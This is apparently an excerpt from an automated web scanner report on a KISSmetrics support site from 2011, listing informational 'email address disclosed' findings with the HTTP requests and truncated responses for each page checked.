GET /apis/javascript HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:40:08 GMT Last-Modified: Fri, 26 Aug 2011 22:36:27 GMT Server: nginx Vary: Accept-Encoding Content-Length: 8199 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /apis/url |
GET /apis/url HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:41:24 GMT Last-Modified: Sat, 27 Aug 2011 08:10:02 GMT Server: nginx Vary: Accept-Encoding Content-Length: 10709 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <code>http://yoursite.com ...[SNIP]... <code>user@domain.com</code> ...[SNIP]... <code>http://yoursite.com ...[SNIP]... <code>bob@bob.com</code> ...[SNIP]... <code>bob@bob.com</code> ...[SNIP]... <code>bob@bob.com</code> ...[SNIP]... <code>http://yoursite.com ...[SNIP]... <code>john@smith.com</code> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /css/screen.css |
GET /css/screen.css HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/css Date: Sun, 28 Aug 2011 18:29:49 GMT Last-Modified: Tue, 12 Apr 2011 14:34:34 GMT Server: nginx Vary: Accept-Encoding Content-Length: 10970 Connection: keep-alive /* Site: KISSmetrics Support Author: Derek P. Collins, dcollins@kissmetrics.com Time: 2010-09-14 15:48:20 */ /* RESET: =reset ------------------------- html, body, div, h1, h2, h3, h4, h5, h6, ul, ol, dl, li, dt, dd, p, blockquote, pre, for ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /getting-started/people |
GET /getting-started/people Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:41:18 GMT Last-Modified: Sat, 27 Aug 2011 02:09:54 GMT Server: nginx Vary: Accept-Encoding Content-Length: 13923 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <code>_kmq.push([' ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /getting-started/products |
GET /getting-started/products Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:40:41 GMT Last-Modified: Sat, 27 Aug 2011 01:49:14 GMT Server: nginx Vary: Accept-Encoding Content-Length: 8059 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /getting-started/saas |
GET /getting-started/saas Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:40:36 GMT Last-Modified: Sat, 27 Aug 2011 17:09:17 GMT Server: nginx Vary: Accept-Encoding Content-Length: 12294 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /misc/api-key |
GET /misc/api-key HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:40:56 GMT Last-Modified: Sun, 28 Aug 2011 00:15:31 GMT Server: nginx Vary: Accept-Encoding Content-Length: 7132 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /misc/javascript-settings |
GET /misc/javascript-settings HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:39:00 GMT Last-Modified: Sun, 28 Aug 2011 09:24:48 GMT Server: nginx Vary: Accept-Encoding Content-Length: 7228 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /misc/site-settings |
GET /misc/site-settings HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:39:10 GMT Last-Modified: Sat, 27 Aug 2011 05:09:35 GMT Server: nginx Vary: Accept-Encoding Content-Length: 7682 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /misc/user-privacy |
GET /misc/user-privacy HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:38:45 GMT Last-Modified: Sat, 27 Aug 2011 01:49:41 GMT Server: nginx Vary: Accept-Encoding Content-Length: 9978 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /overview/how-is |
GET /overview/how-is Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:39:25 GMT Last-Modified: Sat, 27 Aug 2011 00:20:40 GMT Server: nginx Vary: Accept-Encoding Content-Length: 8931 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /search/a |
GET /search/a HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:48:31 GMT Last-Modified: Sun, 28 Aug 2011 20:48:30 GMT Server: nginx Vary: Accept-Encoding Content-Length: 14708 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /search/cookie |
GET /search/cookie HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:39:53 GMT Last-Modified: Sun, 28 Aug 2011 20:39:51 GMT Server: nginx Vary: Accept-Encoding Content-Length: 12570 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /search/xss |
GET /search/xss HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:39:42 GMT Last-Modified: Sun, 28 Aug 2011 20:39:41 GMT Server: nginx Vary: Accept-Encoding Content-Length: 6890 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |